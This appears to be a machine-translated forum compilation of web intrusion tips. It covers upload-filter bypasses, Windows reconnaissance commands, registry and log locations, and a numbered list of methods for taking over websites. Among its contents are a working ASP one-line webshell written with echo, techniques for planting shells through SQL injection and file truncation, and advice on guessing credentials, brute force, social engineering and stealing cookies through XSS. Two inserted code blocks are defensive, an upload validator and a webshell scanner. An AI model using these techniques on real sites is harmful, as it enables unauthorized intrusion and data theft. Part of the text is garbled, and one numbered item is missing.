Web penetration testing experience and skills (all)

Source: Internet
Author: User
Tags ftp connection

Compiled by nuclear'atk:

Getting a shell through upload vulnerabilities:

1. Directly upload .asp, .asa, .jsp, .cer, .php, .aspx, .htr, .cdx and so on, and get the shell.
2. Adding spaces or a few dots after the suffix when uploading can give surprising results. Example: *.asp , *.asp...
3. Upload with a double extension, for example *.jpg.asa (this can also be combined with trick 2).
4. GIF file header spoofing.
5. Uploading a second file with the same name also works very well.
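From the defending side, the five tricks above are exactly what an upload handler has to reject, which is why allowlisting beats denylisting. The validator below is an added example, not part of the original notes; the allowlist, magic-byte table and script markers are assumptions chosen for illustration, and it also rejects null bytes in the name.

```python
# Allowlist of upload extensions the site actually needs (assumed policy).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Server-side executable extensions named in the notes above; any of them
# anywhere in the name (e.g. photo.jpg.asa) is rejected.
EXEC_EXT = {"asp", "asa", "jsp", "cer", "php", "aspx", "htr", "cdx"}
# First bytes the file must start with for the claimed type (assumed table).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Script markers that must not appear inside an image body (header spoofing).
# Re-encoding the image server-side is the stronger control; this is a cheap check.
SCRIPT_MARKERS = (b"<%", b"<?php", b"<?=", b"<script")


def check_upload(filename: str, data: bytes):
    """Return (ok, reason); ok is True only when every check passes."""
    # Use only the base name so path tricks in the client-supplied name are ignored.
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "\x00" in name or "%00" in name:
        return False, "null byte in file name"          # 00 truncation
    if name != name.rstrip(". "):
        return False, "trailing dot or space in file name"  # trick 2
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    exts = parts[1:]
    if any(e in EXEC_EXT for e in exts):
        return False, "executable extension in name"    # tricks 1 and 3
    if len(exts) != 1:
        return False, "double extension"
    ext = exts[0]
    if ext not in ALLOWED_EXT:
        return False, "extension not in allowlist"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if any(m in data for m in SCRIPT_MARKERS):
        return False, "script marker inside image body"  # trick 4
    return True, "ok"
```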

Commands used during intrusion and penetration, with syntax:

set, systeminfo, ipconfig, ping: use these commands to gather more system information.
tasklist /svc: view the PID of each service.
netstat -ano, netstat -abnv
fsutil.exe fsinfo drives: list all drive letters.
dir D:\*conn*.* /s: find the database connection file.
telnet 218.25.88.234 3389: tests whether the port is open to the outside.
echo ^<%execute(Request("cmd"))%^>>E:\K\x.asp: writes a one-sentence shell into the E:\K\ directory; the password is cmd.
type D:\wwwroot\WEB\k6.asp > D:\wwwroot\123\.asp: copies k6.asp from D:\wwwroot\WEB\ to D:\wwwroot\123\ and renames it to .asp.
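From the defender's side, the one-sentence shell that the echo command above writes is easy to find on disk once you know what it looks like. The scanner below is an added example, not part of the original notes; the rule names and the sample web root it builds are constructed for illustration, and the patterns are indicators to review, not proof.

```python
import os
import re
import tempfile

# Extensions IIS/Tomcat/PHP will execute, taken from the upload list above.
EXEC_EXT = {".asp", ".asa", ".cer", ".cdx", ".htr", ".aspx", ".jsp", ".php"}
# Hypothetical rule set: the ASP one-liner from the echo command, plus the
# usual PHP and JSP equivalents. Case-insensitive, whitespace-tolerant.
RULES = [
    ("asp-one-liner", re.compile(rb"(execute|eval)\s*\(\s*request\s*\(", re.I)),
    ("php-one-liner", re.compile(rb"(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.I)),
    ("jsp-runtime-exec", re.compile(rb"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I)),
]


def scan_webroot(root):
    """Return sorted (relative_path, rule_name) pairs for suspicious script files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in EXEC_EXT:
                continue  # a shell in a .gif is not executed by the server
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                body = fh.read(1 << 20)  # the first 1 MiB is enough for one-liners
            for rule, pat in RULES:
                if pat.search(body):
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    hits.append((rel, rule))
                    break
    return sorted(hits)


def build_sample_webroot():
    """Constructed sample tree (not a real site) so the scanner runs offline."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.asp": b'<% Response.Write("hello") %>',          # benign
        "K/x.asp": b'<%execute(Request("cmd"))%>',               # the echo one-liner
        "inc/conn.php": b"<?php $db = 'x'; eval($_POST['c']); ?>",  # PHP equivalent
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root
```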

Sensitive information in the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\: MySQL install location
HKEY_LOCAL_MACHINE\SOFTWARE\hzhost\config\: hzhost (Huazhong virtual host) location
HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\: Serv-U location
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber: port 3389 (Terminal Services)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters: port 1433
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFTPSVC\Parameters\Virtual Roots: server FTP paths

Physical paths of the server log files:

Security log: %SystemRoot%\system32\config\SecEvent.Evt
System log: %SystemRoot%\system32\config\SysEvent.Evt
Application log: %SystemRoot%\system32\config\AppEvent.Evt
FTP connection log and HTTP transaction log: %SystemRoot%\system32\LogFiles\; the subfolders under it hold the FTP and web service logs respectively, with the .log suffix.
Norton AntiVirus log: C:\Documents and Settings\All Users\Application Data\Symantec

Oldjun's experience with website intrusion:

Next I will talk about my personal experience with intrusion, regardless of language. I will only talk about getting a webshell. As for privilege escalation, I will not cover it here; I rarely escalate privileges unless it is really necessary!~

1. No matter what the site is or what language it is written in, when I want to penetrate it the first thing is to scan the directories, ideally finding an upload point and uploading the shell directly. Don't laugh; sometimes you spend a long time on a site and in the end find a ready-made upload point that is easy to guess. However, this happens mostly with ASP!

2. For ASP (aspx) + MSSQL, consider injection first. Usually injection with dbowner permission can write the shell directly. If it cannot be written, or the web server is separated from the database, guess the data and start from the admin backend; in the backend you can upload or modify the configuration file.

3. For ASP (aspx) + Access there are only three ways to get a shell: one is a front-end upload, or injection into the backend followed by an upload; the second is injection into the backend to change the configuration file; the third is, after injecting into the backend, to back up the database or use a database path disclosure, and once I knew the database was an .asp or .asa file, write a one-sentence shell into it directly.

4. PHP + MySQL is usually injection into the backend and then an upload. Occasionally, if you are lucky enough to have high permissions, you can inject select ... into OUTFILE. Then there is local and remote file inclusion. Remote inclusion is not supported by later PHP versions, so I try a local include of an uploaded image file or of something written to a log. Then there are some undisclosed vulnerabilities in PHP programs; if you are lucky, you can write the shell directly.

5. JSP + MySQL uses the database to obtain permissions in basically the same way as PHP, and JSP uploads rarely check the file suffix, so as long as there is an injection point and a backend, a shell is quite easy. I have not met many JSP + Oracle sites, but there too I have tried to guess the user name and password and go in from the backend.

6. No matter what the site, the main site is generally very secure (otherwise it would have been taken early), so generally start from the second-level domains, guess some of the main site's user names and passwords or get the main site's source code, or take a server on the same network segment and then use Cain or ARP.

7. Generally a large site rarely uses an off-the-shelf CMS, so if you are lucky enough to find the source code, the injection, upload and file-write vulnerabilities are all in your hands. Also take a look at the new test sites of those major sites; those sites are still being tested and can be easily won.

8. There is file name truncation in uploads, which has two aspects: one is 00 truncation, the other is long file name truncation (we used this to get HW); then there are a lot of places where files are written, and 00 can be used there too, which has been tried and tested repeatedly. Do not forget uploading into an .asp directory (and of course .asa, .cer, .cdx).

9. PHP sites have magic_quotes_gpc problems on both Windows and Linux. When magic_quotes_gpc is on, you can still select into OUTFILE when injecting through server variables; this was the case with a closed-source CMS I worked on this year. Generally, don't consider writing files when it is on. But if you have that permission, don't forget to read the file source code, because the load_file parameter can be encoded.

Surprise.

11. The use of tools is very important. A WVS scan before the intrusion will help. Although there are many injection tools, they are not necessarily good; today's hardware and software firewalls and anti-injection tools are getting tougher and tougher, so you should not be lazy. More manual work will help you grow.

12. Have you encountered a first-class monitoring system or other post-protection firewall? Sometimes you get in with a one-sentence shell but cannot upload a trojan. At that point you should first learn the encoding, then learn to modify and bypass it.

13. If you want to work on a general website, remember to check the website's copyright notice, find the company that built the website, and start from that company's other websites. Then get the source code and go back to the target; I used this method to win a well-known pharmaceutical company's site.

14. The concept of bypass is never out of date. When you have dbowner via injection, a shell can be easily written to the site you need, saving you the trouble of privilege escalation. If you're lucky, go step by step from the shell to get what you need.

15. Never forget social engineering. When you have nothing else to go on, use social engineering: start with the QQ, ID card number, email and so on of the XX webmaster. Sometimes there are surprises; in addition, do not forget the simple attempts admin/admin, test/test, 123456/123456. Of course, you can also brute force.

16. Do not ignore XSS, and do not ignore cookies. XSS can steal cookies; learn how to use them. Cookies can be forged to log in, cookies can be injected, and cookie injection bypasses the vast majority of firewalls.

17. We usually collect a lot of paths, source code and tools to enrich our "arsenal". I recommend recording your intrusion steps or reviewing them afterwards; I usually keep them in a txt file, and I also want to do the opposite.

18. Learn more, read source code, and read published 0days. Scripting is the prerequisite for intrusion, not tools; using tools alone is just showing off.
